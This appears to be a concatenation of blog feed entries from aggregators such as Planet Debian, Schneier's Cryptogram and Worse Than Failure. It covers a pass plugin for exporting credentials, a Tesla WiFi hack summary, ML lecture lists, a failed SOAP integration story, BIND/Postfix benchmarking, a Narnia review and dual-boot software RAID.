The last time I talked about pass was when I talked about showing the age of my credentials, via the integrated git support.

That then became a pass-plugin:

  frodo ~ $ pass age
  6 years ago GPG/root@localhost.gpg
  6 years ago GPG/
  4 years, 8 months ago Domains/
  4 years, 7 months ago Mobile/
  1 year, 3 months ago Websites/
  1 year ago Financial/
  1 year ago Mobile/KiK.gpg
  4 days ago Enfuce/sre.tst.gpg

Anyway today's work involved writing another plugin, named env. I store my data in pass in a consistent form, each entry looks like this:

   username: steve
   password: secrit
   # Extra data

The keys vary, sometimes I use "login", sometimes "username", other times "email", but I always label the fields in some way.

Recently I was working with some CLI tooling that wants to have a username/password specified and I patched it to read from the environment instead. Now I can run this:

     $ pass env internal/cli/tool-name
     export username="steve"
     export password="secrit"

That's ideal, because now I can source that from within a shell:

   $ source <(pass env internal/cli/tool-name)
   $ echo $username

Or I could directly execute the tool I want:

   $ pass env --exec=$HOME/ldap/ internal/cli/tool-name
   you are steve

TLDR: If you store your password entries in "key: value" form you can process them to export $KEY=$value, and that allows them to be used without copying and pasting into command-line arguments (e.g. "~/ldap/ --username=steve --password=secrit")

Cryptogram Tesla Remotely Hacked from a Drone

This is an impressive hack:

Security researchers Ralf-Philipp Weinmann of Kunnamon, Inc. and Benedikt Schmotzle of Comsecuris GmbH have found remote zero-click security vulnerabilities in an open-source software component (ConnMan) used in Tesla automobiles that allowed them to compromise parked cars and control their infotainment systems over WiFi. It would be possible for an attacker to unlock the doors and trunk, change seat positions, both steering and acceleration modes — in short, pretty much what a driver pressing various buttons on the console can do. This attack does not yield drive control of the car though.

That last sentence is important.

News article.

Planet DebianErich Schubert: Machine Learning Lecture Recordings

I have uploaded most of my “Machine Learning” lecture to YouTube.

The slides are in English, but the audio is in German.

Some very basic contents (e.g., a demo of standard k-means clustering) were left out of this advanced class; instead, only a link to recordings from an earlier class was given. In this class, I wanted to focus on the improved (accelerated) algorithms instead. These are not included here (yet). I believe there are some contents covered in this class you will find nowhere else (yet).

The first unit is pretty long (I did not split it further yet). The later units are shorter recordings.

ML F1: Principles in Machine Learning

ML F2/F3: Correlation does not Imply Causation & Multiple Testing Problem

ML F4: Overfitting – Überanpassung

ML F5: Fluch der Dimensionalität – Curse of Dimensionality

ML F6: Intrinsische Dimensionalität – Intrinsic Dimensionality

ML F7: Distanzfunktionen und Ähnlichkeitsfunktionen

ML L1: Einführung in die Klassifikation

ML L2: Evaluation und Wahl von Klassifikatoren

ML L3: Bayes-Klassifikatoren

ML L4: Nächste-Nachbarn Klassifikation

ML L5: Nächste Nachbarn und Kerndichteschätzung

ML L6: Lernen von Entscheidungsbäumen

ML L7: Splitkriterien bei Entscheidungsbäumen

ML L8: Ensembles und Meta-Learning: Random Forests und Gradient Boosting

ML L9: Support Vector Machinen - Motivation

ML L10: Affine Hyperebenen und Skalarprodukte – Geometrie für SVMs

ML L11: Maximum Margin Hyperplane – die “breitest mögliche Straße”

ML L12: Training Support Vector Machines

ML L13: Non-linear SVM and the Kernel Trick

ML L14: SVM – Extensions and Conclusions

ML L15: Motivation of Neural Networks

ML L16: Threshold Logic Units

ML L17: General Artificial Neural Networks

ML L18: Learning Neural Networks with Backpropagation

ML L19: Deep Neural Networks

ML L20: Convolutional Neural Networks

ML L21: Recurrent Neural Networks and LSTM

ML L22: Conclusion Classification

ML U1: Einleitung Clusteranalyse

ML U2: Hierarchisches Clustering

ML U3: Accelerating HAC mit Anderberg’s Algorithmus

ML U4: k-Means Clustering

ML U5: Accelerating k-Means Clustering

ML U6: Limitations of k-Means Clustering

ML U7: Extensions of k-Means Clustering

ML U8: Partitioning Around Medoids (k-Medoids)

ML U9: Gaussian Mixture Modeling (EM Clustering)

ML U10: Gaussian Mixture Modeling Demo

ML U11: BIRCH and BETULA Clustering

ML U12: Motivation Density-Based Clustering (DBSCAN)

ML U13: Density-reachable and density-connected (DBSCAN Clustering)

ML U14: DBSCAN Clustering

ML U15: Parameterization of DBSCAN

ML U16: Extensions and Variations of DBSCAN Clustering

ML U17: OPTICS Clustering

ML U18: Cluster Extraction from OPTICS Plots

ML U19: Understanding the OPTICS Cluster Order

ML U20: Spectral Clustering

ML U21: Biclustering and Subspace Clustering

ML U22: Further Clustering Approaches

Worse Than FailureA Specified Integration

Shipping meaningful data from one company's IT systems to another company's IT systems is one of those problems that's been solved a billion times, with entirely new failure modes each time. EDI alone has a dozen subspecifications and allows data transfer via everything ranging from FTP to email.

When XML made its valiant attempt to take over the world, XML schemas, SOAP and their associated related specifications were going to solve all these problems. If you needed to communicate how to interact with a service, you could publish a WSDL file. Anyone who needed to talk to your service could scrape the WSDL and automatically "learn" how to send properly formatted messages. The WSDL is, in practice, a contract offered by a web service.

But the WSDL is just one mechanism to provide a specification for software. Which brings us to Patrick.

Patrick needed to be able to transmit financial transactions from one of their internal systems to a vendor in France. Both parties discussed the requirements, what specific fields needed to be sent, how, what they actually meant, and hammered out a specification document that confirmed their understanding. It would be a SOAP-based web service, and the French team would be implementing it on their end.

"Great," Patrick said in one of their meetings. "Once you've got the interface defined according to our specification, you should send us the WSDL file."

The next day, they received a WSDL file. It was a "hello world" file, autogenerated for a stub service with one method- helloWorld.

"That isn't what we're expecting," Patrick emailed back. "Could you please send us a WSDL which implements the spec?"

The next day, Patrick got a fresh WSDL. This one looked vaguely like the specification, in that some of the methods and fields were named correctly, but half of them were missing.

"We don't need to rush this," Patrick said, "so please review the specification and ensure that the WSDL complies with the specification we agreed to."

Two days later, Patrick got a "hello world" WSDL again, followed by a WSDL for a completely unrelated web service.

Over the next few weeks, the vendor team produced a steady stream of WSDL files. Each was incorrect, sometimes wildly off target, sometimes simply missing a few fields. One Thursday, seemingly by accident, the vendor team sent a correct WSDL, and immediately followed up with another one missing half the key fields.

Eventually, they sent a WSDL that more-or-less matched the spec, and stopped trying to "fix" it. Development on both sides progressed at the pace typical of any enterprise integration project: development happened less often than meetings, and milestones slid by at an absolutely glacial pace.

But even glaciers move. So the day came for the first end-to-end test. Patrick's team sent a SOAP request containing a valid transaction.

They got no response back.

Patrick got his opposite number in France, Jean, on the phone, and explained what he was seeing.

"No," Jean said. "I can see that you are sending requests, but your requests are empty."

"We are not sending empty requests," Patrick said.

"Apologies, but yes, you are."

Patrick's team set up logging and tracked every outgoing request, and its payload. They manually validated it against the WSDL. They programmatically validated it against the WSDL.

Patrick went back to Jean with his evidence.

"No, the problem must be on your side."

"Well, I've provided my logs," Patrick said. "What logging are you getting on your side? Maybe something in the middle is messing things up?"

"One moment," Jean said. Patrick listened to him typing for a bit, and then some puzzled mumbling. Then a long stretch of silence.

"Uh, Jean?"

The silence stretched longer.

"You still there?"

"Oui," Jean said, distantly. "I… ah, I cannot find the logs. Well, I can find logs, just not the logs for this service. It appears it is not installed on our test server."

"You… didn't install it? The thing we're explicitly testing? It's not installed."

"Yes. I do not have permissions to release that code. I'll have to set up a meeting."

They aborted the test that day, and for many days thereafter. When they did finally test, the vendor team deployed an old version, with a "hello world" WSDL. Eventually, the customer that requested this integration got frustrated with waiting, and switched to a different set of vendors that could actually communicate with each other. To this day, that test server is still probably running with a "hello world" WSDL.


Planet DebianBenjamin Mako Hill: NSF CAREER Award

In exciting professional news, it was recently announced that I got a National Science Foundation CAREER award! The CAREER is the US NSF’s most prestigious award for early-career faculty. In addition to the recognition, the award involves a bunch of money for me to put toward my research over the next 5 years. The Department of Communication at the University of Washington has put up a very nice web page announcing the thing. It’s all very exciting and a huge honor. I’m very humbled.

The grant will support a bunch of new research to develop and test a theory about the relationship between governance and online community lifecycles. If you’ve been reading this blog for a while, you’ll know that I’ve been involved in a bunch of research to describe how peer production communities tend to follow common patterns of growth and decline, as well as studies that show that many open communities become increasingly closed in ways that deter lots of the kinds of contributions that made the communities successful in the first place.

Over the last few years, I’ve worked with Aaron Shaw to develop the outlines of an explanation for why many communities become increasingly closed over time in ways that hurt their ability to integrate contributions from newcomers. Over the course of the work on the CAREER, I’ll be continuing that project with Aaron, and I’ll also be working to test that explanation empirically and to develop new strategies about what online communities can do as a result.

In addition to supporting research, the grant will support a bunch of new outreach and community building within the Community Data Science Collective. In particular, I’m planning to use the grant to do a better job of building relationships with community participants, community managers, and others in the platforms we study. I’m also hoping to use the resources to help the CDSC do a better job of sharing our stuff out in ways that are useful, as well as doing a better job of listening and learning from the communities that our research seeks to inform.

There are many to thank. The proposed work is the direct result of the work I did at the Center for Advanced Study in the Behavioral Sciences at Stanford, where I got to spend the 2018-2019 academic year in Claude Shannon’s old office talking through these ideas with an incredible range of other scholars over lunch every day. It’s also the product of years of conversations with Aaron Shaw and Yochai Benkler. The proposal itself reflects the excellent work of the whole CDSC, who did the work that made the award possible and provided me with detailed feedback on the proposal itself.


Cryptogram Identifying the Person Behind Bitcoin Fog

The person behind the Bitcoin Fog was identified and arrested. Bitcoin Fog was an anonymization service: for a fee, it mixed a bunch of people’s bitcoins up so that it was hard to figure out where any individual coins came from. It ran for ten years.

Identifying the person behind Bitcoin Fog serves as an illustrative example of how hard it is to be anonymous online in the face of a competent police investigation:

Most remarkable, however, is the IRS’s account of tracking down Sterlingov using the very same sort of blockchain analysis that his own service was meant to defeat. The complaint outlines how Sterlingov allegedly paid for the server hosting of Bitcoin Fog at one point in 2011 using the now-defunct digital currency Liberty Reserve. It goes on to show the blockchain evidence that identifies Sterlingov’s purchase of that Liberty Reserve currency with bitcoins: He first exchanged euros for the bitcoins on the early cryptocurrency exchange Mt. Gox, then moved those bitcoins through several subsequent addresses, and finally traded them on another currency exchange for the Liberty Reserve funds he’d use to set up Bitcoin Fog’s domain.

Based on tracing those financial transactions, the IRS says, it then identified Mt. Gox accounts that used Sterlingov’s home address and phone number, and even a Google account that included a Russian-language document on its Google Drive offering instructions for how to obscure Bitcoin payments. That document described exactly the steps Sterlingov allegedly took to buy the Liberty Reserve funds he’d used.

LongNowPlay inspired by Long Now premieres this month

Gutter Street, a London-based theatre company, is premiering a play called The Long Now later this month. “The Long Now is inspired by the work of the @longnow foundation and takes a look at the need to promote long term thinking through our unique Gutter Street Lens,” the company said on Twitter.

Play summary:

Tudor is the finest clockmaker of all time. She knows her cogs from her clogs but will she be able to finish fixing her town’s ancient clock before time runs out? She is distracted by the beast that twists her dreams into nightmares and the wonder of the outside world. In search for the right tools in her trusty pile of things, will she finally finish the job she started…or will she just have another cup of tea?

More info and tickets here.

Worse Than FailureCodeSOD: A Real Switcheroo

Many of the stories and much of the code we see here are objectively bad. Many of them are bad when placed into the proper context. Sometimes we're just opinionated. And sometimes, there's just something weird that treads the line between being an abuse of code and almost being smart. Almost.

Nic was debugging some Curses-based code, and found this "solution" to handling arrow key inputs:

switch (val) {
case ERR:
    // [snip]
default:
    switch (val) {
    case 65: // [snip]
    case 66: // [snip]
    case 67: // [snip]
    case 68: // [snip]
    }
}

The obvious badness here is the nested switch. Clearly, this isn't necessary. Putting the ERR check at the top makes sense. But burying a second switch under the default clause is pointless and weird. Given that this is C, and switches have weird power, I'm sure there's probably some bad side effect of doing this. Even if there isn't, it isn't needed.

But. It's almost smart. There's one thing that leaps out to me in this code: that there are two distinct paths, one for error-handling, and one for processing input. It's a weird way to accomplish that goal, mind you, but it does accomplish that goal. I'd still never do it, because almost smart is way worse than actually smart (and also way worse than really stupid). But I guess I can sympathize with the developer.


Planet DebianRussell Coker: DNS, Lots of IPs, and Postal

I decided to start work on repeating the tests for my 2006 OSDC paper on Benchmarking Mail Relays [1] and discover how the last 15 years of hardware developments have changed things. There have been software changes in that time too, but nothing that compares with going from single core 32bit systems with less than 1G of RAM and 60G IDE disks to multi-core 64bit systems with 128G of RAM and SSDs. As an aside the hardware I used in 2006 wasn’t cutting edge and the hardware I’m using now isn’t either. In both cases it’s systems I bought second hand for under $1000. Pedants can think of this as comparing 2004 and 2018 hardware.


I decided to make some changes to reflect the increased hardware capacity and use 2560 domains and IP addresses, which gave the following errors as well as a startup time of a minute on a system with two E5-2620 CPUs.

May  2 16:38:37 server named[7372]: listening on IPv4 interface lo,
May  2 16:38:37 server named[7372]: listening on IPv4 interface eno4,
May  2 16:38:37 server named[7372]: listening on IPv4 interface eno4,
May  2 16:38:37 server named[7372]: listening on IPv4 interface eno4,
May  2 16:38:37 server named[7372]: listening on IPv4 interface eno4,
May  2 16:39:33 server named[7372]: listening on IPv4 interface eno4,
May  2 16:39:33 server named[7372]: listening on IPv4 interface eno4,
May  2 16:39:33 server named[7372]: listening on IPv4 interface eno4,
May  2 16:39:33 server named[7372]: listening on IPv6 interface lo, ::1#53
May  2 16:39:36 server named[7372]: zone localhost/IN: loaded serial 2
May  2 16:39:36 server named[7372]: all zones loaded
May  2 16:39:36 server named[7372]: running
May  2 16:39:36 server named[7372]: socket: file descriptor exceeds limit (123273/21000)
May  2 16:39:36 server named[7372]: managed-keys-zone: Unable to fetch DNSKEY set '.': not enough free resources
May  2 16:39:36 server named[7372]: socket: file descriptor exceeds limit (123273/21000)

The first thing I noticed is that a default configuration of BIND with 2560 local IPs (when just running in the default recursive mode) takes a minute to start and needs to open over 100,000 file handles. BIND also had some errors in that configuration which led to it not accepting shutdown requests. I filed Debian bug report #987927 [2] about this. One way of dealing with the errors in this situation on Debian is to edit /etc/default/named and put in the following line to allow BIND to open many file handles:

OPTIONS="-u bind -S 150000"

But the best thing to do for BIND when there are many IP addresses that aren’t going to be used for DNS service is to put a directive like the following in the BIND configuration to specify the IP address or addresses that are used for the DNS service:

listen-on {; };

I have just added the listen-on and listen-on-v6 directives to one of my servers with about a dozen IP addresses. While 2560 IP addresses is an unusual corner case it’s not uncommon to have dozens of addresses on one system.
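For reference, a hypothetical named.conf fragment with both directives might look like this (the loopback addresses are stand-ins; substitute the address(es) that actually serve DNS on your machine):

```
options {
    // ...existing options...
    listen-on {; };     // hypothetical IPv4 address list
    listen-on-v6 { ::1; };        // hypothetical IPv6 address list
};
```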


When doing tests of Postfix for relaying mail I noticed that mail was being deferred with DNS problems (the error was “Host or domain name not found. Name service error for type=MX: Host not found, try again”). I tested the DNS lookups with dig, which failed with errors like the following:

dig -t mx
socket.c:1740: internal_send: Invalid argument
socket.c:1740: internal_send: Invalid argument
socket.c:1740: internal_send: Invalid argument

; <<>> DiG 9.16.13-Debian <<>> -t mx
;; global options: +cmd
;; connection timed out; no servers could be reached

Here is a sample of the strace output from tracing dig:

bind(20, {sa_family=AF_INET, sin_port=htons(0), 
sin_addr=inet_addr("")}, 16) = 0
recvmsg(20, {msg_namelen=128}, 0)       = -1 EAGAIN (Resource temporarily unavailable)
write(4, "\24\0\0\0\375\377\377\377", 8) = 8
sendmsg(20, {msg_name={sa_family=AF_INET, sin_port=htons(53), 
sin_addr=inet_addr("")}, msg_
namelen=16, msg_iov=[{iov_base="86\1 
\0\0\f\0\n\0\10's\367\265\16bx\354", iov_len=57}], msg_iovlen=1, 
msg_controllen=0, msg_flags=0}, 0) 
= -1 EINVAL (Invalid argument)
write(2, "socket.c:1740: ", 15)         = 15
write(2, "internal_send: Invalid argument", 45) = 45
write(2, "\n", 1)                       = 1
futex(0x7f5a80696084, FUTEX_WAIT_PRIVATE, 0, NULL) = 0
futex(0x7f5a80696010, FUTEX_WAKE_PRIVATE, 1) = 0
futex(0x7f5a8069809c, FUTEX_WAKE_PRIVATE, 1) = 1
futex(0x7f5a80698020, FUTEX_WAKE_PRIVATE, 1) = 1
sendmsg(20, {msg_name={sa_family=AF_INET, sin_port=htons(53), 
sin_addr=inet_addr("")}, msg_namelen=16, msg_iov=[{iov_base="86\1 
iov_len=57}], msg_iovlen=1, msg_controllen=0, msg_flags=0}, 0) = -1 EINVAL 
(Invalid argument)
write(2, "socket.c:1740: ", 15)         = 15
write(2, "internal_send: Invalid argument", 45) = 45
write(2, "\n", 1)

Ubuntu bug #1702726 claims that an insufficient ARP cache was the cause of dig problems [3]. At the time I encountered the dig problems I was seeing lots of kernel error messages “neighbour: arp_cache: neighbor table overflow” which I solved by putting the following in /etc/sysctl.d/mine.conf:

net.ipv4.neigh.default.gc_thresh3 = 4096
net.ipv4.neigh.default.gc_thresh2 = 2048
net.ipv4.neigh.default.gc_thresh1 = 1024

Making that change (and having rebooted because I didn’t need to run the server overnight) didn’t entirely solve the problems. I have seen some DNS errors from Postfix since then but they are less common than before. When they happened I didn’t have that error from dig. At this stage I’m not certain that the ARP change fixed the dig problem although it seems likely (it’s always difficult to be certain that you have solved a race condition instead of made it less common or just accidentally changed something else to conceal it). But it is clearly a good thing to have a large enough ARP cache so the above change is probably the right thing for most people (with the possibility of changing the numbers according to the required scale). Also people having that dig error should probably check their kernel message log, if the ARP cache isn’t the cause then some other kernel networking issue might be related.

Preliminary Results

With Postfix I’m seeing around 24,000 messages relayed per minute with more than 60% CPU time idle. I’m not sure exactly how to count idle time when there are 12 CPU cores and 24 hyper-threads, as having only 1 process scheduled for each pair of hyper-threads on a core is very different to having half the CPU cores unused. I ran my script to disable hyper-threads by telling the Linux kernel to disable each processor core that has the same core ID as another; it was buggy and disabled the second CPU altogether (better than finding this out on a production server). Going from 24 hyper-threads of 2 CPUs to 6 non-HT cores of a single CPU didn’t change the throughput and the idle time went to about 30%, so I have possibly halved the CPU capacity for these tasks by disabling all hyper-threads and one entire CPU, which is surprising given that I theoretically reduced the CPU power by 75%. I think my focus now has to be on hyper-threading optimisation.

Since 2006 the performance has gone from ~20 messages per minute on relatively commodity hardware to 24,000 messages per minute on server equipment that is uncommon for home use but within range of home desktop PCs. I think that a typical desktop PC with a similar-speed CPU, 32G of RAM, and SSD storage would give the same performance. Moore’s Law (that transistor count doubles approximately every 2 years) is often misquoted as performance doubling every 2 years. In this case more than 1024× the performance over 15 years means performance doubling roughly every 18 months. Probably most of that is due to SATA SSDs massively outperforming IDE hard drives, but it’s still impressive.
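A quick sanity check on that doubling estimate, using the ~20 and ~24,000 messages-per-minute figures:

```shell
# throughput went from ~20 to ~24,000 messages/minute in 15 years;
# compute how often it doubled on the way
awk 'BEGIN {
    factor = 24000 / 20                 # about 1200x
    months = 15 * 12
    doublings = log(factor) / log(2)    # about 10.2
    printf "one doubling every %.1f months\n", months / doublings
}'
```

That works out to one doubling every ~17.6 months, close to the 18 months that a clean 1024× over 15 years would give.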


I’ve been using for test purposes for a long time, but RFC2606 specifies .test, .example, and .invalid as reserved top level domains for such things. On the next iteration I’ll change my scripts to use .test.

My current test setup has a KVM virtual machine running my bhm program to receive mail, which has been taking between 20% and 50% of a CPU core in my tests so far. While that is happening, the kvm process is reported as taking between 60% and 200% of a CPU core, so kvm takes as much as 4× the CPU of the guest due to the virtual networking overhead – even though I’m using the virtio-net-pci driver (the most efficient form of KVM networking for emulating a regular Ethernet card). I’ve also seen this in production with a virtual machine running a Tor relay node.
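For reference, a minimal KVM invocation using that driver might look like this (a sketch only; the disk image, tap device, and MAC address are made-up examples, not my actual configuration):

```shell
qemu-system-x86_64 -enable-kvm -m 1024 \
  -drive file=guest.img,if=virtio \
  -netdev tap,id=net0,ifname=tap0 \
  -device virtio-net-pci,netdev=net0,mac=52:54:00:12:34:56
```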

I’ve fixed a bug where Postal would try to send the SMTP QUIT command after encountering a TCP error, which caused an infinite loop and SEGV.

Planet DebianRuss Allbery: Review: The Voyage of the Dawn Treader

Review: The Voyage of the Dawn Treader, by C.S. Lewis

Illustrator: Pauline Baynes
Series: Chronicles of Narnia #3
Publisher: Collier Books
Copyright: 1952
Printing: 1978
ISBN: 0-02-044260-2
Format: Mass market
Pages: 216

There was a boy named Eustace Clarence Scrubb and he almost deserved it.

The Voyage of the Dawn Treader is the third Narnia book in original publication order (see my review of The Lion, the Witch and the Wardrobe for more about reading order). You could arguably start reading here; there are a lot of references to the previous books, but mostly as background material, and I don't think any of it is vital. If you wanted to sample a single Narnia book to see if you'd get along with the series, this is the one I'd recommend.

Since I was a kid, The Voyage of the Dawn Treader has held the spot of my favorite of the series. I'm happy to report that it still holds up. Apart from one bit that didn't age well (more on that below), this is the book where the story and the world-building come together, in part because Lewis picks a plot shape that works with what he wants to write about.

The younger two Pevensie children, Edmund and Lucy, are spending the summer with Uncle Harold and Aunt Alberta because their parents are in America. That means spending the summer with their cousin Eustace. C.S. Lewis had strong opinions about child-raising that crop up here and there in his books, and Harold and Alberta are his example of everything he dislikes: caricatured progressive, "scientific" parents who don't believe in fiction or mess or vices. Eustace therefore starts the book as a terror, a whiny bully who has only read boring practical books and is constantly scoffing at the Pevensies and making fun of their stories of Narnia. He is thus entirely unprepared when the painting of a ship in the guest bedroom turns into a portal to Narnia and dumps the three children into the middle of the ocean.

Thankfully, they're in the middle of the ocean near the ship in the painting. That ship is the Dawn Treader, and onboard is Caspian from the previous book, now king of Narnia. He has (improbably) sorted things out in his kingdom and is now on a sea voyage to find seven honorable Telmarine lords who left Narnia while his uncle was usurping the throne. They're already days away from land, headed towards the Lone Islands and, beyond that, into uncharted seas.


Obviously, Eustace gets a redemption arc, which is roughly the first half of this book. It's not a bad arc, but I am always happy when it's over. Lewis tries so hard to make Eustace insufferable that it becomes tedious. As an indoor kid who would not consider being dumped on a primitive sailing ship to be a grand adventure, I wanted to have more sympathy for him than the book would allow.

The other problem with Eustace's initial character is that Lewis wants it to stem from "modern" parenting and not reading the right sort of books, but I don't buy it. I've known kids whose parents didn't believe in fiction, and they didn't act anything like this (and kids pick up a lot more via osmosis regardless of parenting than Lewis seems to realize). What Eustace acts like instead is an entitled, arrogant rich kid who is used to the world revolving around him, and it's fascinating to me how Lewis ignores class to focus on educational philosophy.

The best part of Eustace's story is Reepicheep, which is just setup for Reepicheep becoming the best part of The Voyage of the Dawn Treader.

Reepicheep, the leader of Narnia's talking mice, first appears in Prince Caspian, but there he's mostly played for laughs: the absurdly brave and dashing mouse who rushes into every fight he sees. In this book, he comes into his own as the courage and occasionally the moral conscience of the party. Caspian wants to explore and to find the lords of his past, the Pevensie kids want to have a sea adventure, and Eustace is in this book to have a redemption arc, but Reepicheep is the driving force at the heart of the voyage. He's going to Aslan's country beyond the sea, armed with a nursemaid's song about his destiny and a determination to be his best and most honorable self every step of the way, and nothing is going to stop him.

Eustace, of course, takes an immediate dislike to a talking rodent. Reepicheep, in return, is the least interested of anyone on the ship in tolerating Eustace's obnoxious behavior and would be quite happy to duel him. But when Eustace is turned into a dragon, Reepicheep is the one who spends hours with him, telling him stories and ensuring he's not alone. It's beautifully handled, and my only complaint is that Lewis doesn't do enough with the Eustace and Reepicheep friendship (or indeed with Eustace at all) for the rest of the book.

After Eustace's restoration and a few other relatively short incidents comes the second long section of the book and the part that didn't age well: the island of the Dufflepuds. It's a shame because the setup is wonderful: a cultivated island in the middle of nowhere with no one in sight, mysterious pounding sounds and voices, the fun of trying to figure out just what these invisible creatures could possibly be, and of course Lucy's foray into the second floor of a house, braving the lair of a magician to find and read one of the best books of magic in fantasy.

Everything about how Lewis sets this scene is so well done. The kids are coming from an encounter with a sea serpent and a horrifically dangerous magic island and land on this scene of eerily normal domesticity. The most dangerous excursion is Lucy going upstairs in a brightly lit house with soft carpet in the middle of the day. And yet it's incredibly tense because Lewis knows exactly how to put you in Lucy's head, right down to having to stand with her back to an open door to read the book.

And that book! The pages only turn forward, the spells are beautifully illustrated, and the sense of temptation is palpable. Lucy reading the eavesdropping spell is one of the more memorable bits in this series, at least for me, and makes a surprisingly subtle moral point about the practical reasons why invading other people's privacy is unwise and can just make you miserable. And then, when Lucy reads the visibility spell that was her goal, there's this exchange, which is pure C.S. Lewis:

"Oh Aslan," said she, "it was kind of you to come."

"I have been here all the time," said he, "but you have just made me visible."

"Aslan!" said Lucy almost a little reproachfully. "Don't make fun of me. As if anything I could do would make you visible!"

"It did," said Aslan. "Did you think I wouldn't obey my own rules?"

I love the subtlety of what's happening here: the way that Lucy is much more powerful than she thinks she is, but only because Aslan decided to make the rules that way and chooses to follow his own rules, making himself vulnerable in a fascinating way. The best part is that Lewis never belabors points like this; the characters immediately move on to talk about other things, and no one feels obligated to explain.

But, unfortunately, along with the explanation of the thumping and the magician, we learn that the Dufflepuds are (remarkably dim-witted) dwarfs, the magician is their guardian (put there by Aslan, no less!), he transformed them into rather absurd shapes that they hate, and all of this is played for laughs. Once you notice that these are sentient creatures being treated essentially like pets (and physically transformed against their will), the level of paternalistic colonialism going on here is very off-putting. It's even worse that the Dufflepuds are memorably funny (washing dishes before dinner to save time afterwards!) and are arguably too dim to manage on their own, because Lewis made the authorial choice to write them that way. The "white man's burden" feeling is very strong.

And Lewis could have made other choices! Coriakin the magician is a fascinating and somewhat morally ambiguous character. We learn later in the book that he's a star and his presence on the island is a punishment of sorts, leading to one of my other favorite bits of theology in this book:

"My son," said Ramandu, "it is not for you, a son of Adam, to know what faults a star can commit."

Lewis could have kept most of the setup, kept the delightfully silly things the Dufflepuds believe, changed who was responsible for their transformation, and given Coriakin a less authoritarian role, and the story would have been so much stronger for it.

After this, the story gets stranger and wilder, and it's in the last part that I think the true magic of this book lies. The entirety of The Voyage of the Dawn Treader is a progression from a relatively mundane sea voyage to something more awe-inspiring. The last few chapters are a tour de force of wonder: rejuvenating stars, sunbirds, the Witch's stone knife, undersea kingdoms, a sea of lilies, a wall of water, the cliffs of Aslan's country, and the literal end of the world. Lewis does it without much conflict, with sparse description in a very few pages, and with beautifully memorable touches like the quality of the light and the hush that falls over the ship.

This is the part of Narnia that I point to and wonder why I don't see more emulation (although I should note that it is arguably an immram). Tolkien-style fantasy, with dwarfs and elves and magic rings and great battles, is everywhere, but I can't think of many examples of this sense of awe and discovery without great battles and detailed explanations. Or of characters like Reepicheep, who gets one of the best lines of the series:

"My own plans are made. While I can, I sail east in the Dawn Treader. When she fails me, I paddle east in my coracle. When she sinks, I shall swim east with my four paws. And when I can swim no longer, if I have not reached Aslan's country, or shot over the edge of the world in some vast cataract, I shall sink with my nose to the sunrise and Peepiceek shall be the head of the talking mice in Narnia."

The last section of The Voyage of the Dawn Treader is one of my favorite endings of any book precisely because it's so different than the typical ending of a novel. The final return to England is always a bit disappointing in this series, but it's very short and is preceded by so much wonder that I don't mind. Aslan does appear to the kids as a lamb at the very end of the world, making Lewis's intended Christian context a bit more obvious, but even that isn't belabored, just left there for those who recognize the symbolism to notice.

I was curious during this re-read to understand why The Voyage of the Dawn Treader is so much better than the first two books in the series. I think it's primarily due to two things: pacing, and a story structure that's better aligned with what Lewis wants to write about.

For pacing, both The Lion, the Witch and the Wardrobe and Prince Caspian have surprisingly long setups for short books. In The Voyage of the Dawn Treader, by contrast, it takes only 35 pages to get the kids in Narnia, introduce all the characters, tour the ship, learn why Caspian is off on a sea voyage, establish where this book fits in the Narnian timeline, and have the kids be captured by slavers. None of the Narnia books are exactly slow, but Dawn Treader is the first book of the series that feels like it knows exactly where it's going and isn't wasting time getting there.

The other structural success of this book is that it's a semi-episodic adventure, which means Lewis can stop trying to write about battles and political changes whose details he's clearly not interested in and instead focus wholeheartedly on sense-of-wonder exploration. The island-hopping structure lets Lewis play with ideas and drop them before they wear out their welcome. And the lack of major historical events also means that Aslan doesn't have to come in to resolve everything and instead can play the role of guardian angel.

I think The Voyage of the Dawn Treader has the most compelling portrayal of Aslan in the series. He doesn't make decisions for the kids or tell them directly what to do the way he did in the previous two books. Instead, he shows up whenever they're about to make a dreadful mistake and does just enough to get them to make a better decision. Some readers may find this takes too much of the tension out of the book, but I have always appreciated it. It lets nervous child readers enjoy the adventures while knowing that Aslan will keep anything too bad from happening. He plays the role of a protective but non-interfering parent in a genre that usually doesn't have parents because they would intervene to prevent adventures.

I enjoyed this book just as much as I remembered enjoying it during my childhood re-reads. Still the best book of the series.

This, as with both The Lion, the Witch and the Wardrobe and Prince Caspian, was originally intended to be the last book of the series. That, of course, turned out to not be the case, and The Voyage of the Dawn Treader is followed (in both chronological and original publication order) by The Silver Chair.

Rating: 9 out of 10

Cory DoctorowHow To Destroy Surveillance Capitalism (Part 05)

This week on my podcast, part five of a serialized reading of my 2020 Onezero/Medium book How To Destroy Surveillance Capitalism, now available in paperback (you can also order signed and personalized copies from Dark Delicacies, my local bookstore).


Planet DebianJunichi Uekawa: First email from my new machine.

First email from my new machine. I didn't have a desktop Debian machine for a long time and now I have one set up. I rewrote my procmail/formail recipe, especially the part where I had a complex shell script to generate my folder rules. I rewrote those 4 lines of shell script as 200 lines of Go, with unit tests. The part that took the longest was finding out how to write unit tests in Go, and how to properly use go.mod to be able to import packages from subdirectories. I guess that's part of the fun.


Planet DebianSantiago García Mantiñán: Windows and Linux software Raid dual boot BIOS machine

One could think that nowadays having a machine with software raid doing dual boot should be easy, but... my experience showed that it is not that easy.

Having a Windows machine do software raid is easy (I still don't understand why it doesn't really work like it should, but that is because I'm used to Linux software raid), and having software raid on Linux is also really easy. But doing so on a BIOS booted machine, on mbr disks (as Windows doesn't allow GPT on BIOS) is quite a pain.

The problem is how Windows does all this with its dynamic disks. What happens is that you go from a partitioning like this:

/dev/sda1 *        2048    206847    204800   100M  7 HPFS/NTFS/exFAT
/dev/sda2        206848 312580095 312373248   149G  7 HPFS/NTFS/exFAT
/dev/sda3     312580096 313165823    585728   286M 83 Linux
/dev/sda4     313165824 957698047 644532224 307,3G fd Linux raid autodetect

To something like this:

/dev/sda1            63      2047      1985 992,5K 42 SFS
/dev/sda2 *        2048    206847    204800   100M 42 SFS
/dev/sda3        206848 312580095 312373248   149G 42 SFS
/dev/sda4     312580096 976769006 664188911 316,7G 42 SFS

These are the physical partitions as seen by fdisk; the logical partitions are still like before, of course, so there is no problem accessing them under Linux or Windows. But what happens here is that Windows uses the first sectors for its dynamic-disk metadata, so... you cannot use those sectors to write grub info there :-(

So... the solution I found was to install Debian's mbr and make it boot grub. But then... where do I store grub's info? Well, for this I'm using a btrfs /boot, which is on partition 3, as btrfs leaves room for embedding grub's info, and I set up the software raid with ext4 on partition 4, like you can see in my first partition dump. Of course, you can have just btrfs with its own software raid; then you don't need the fourth partition at all.

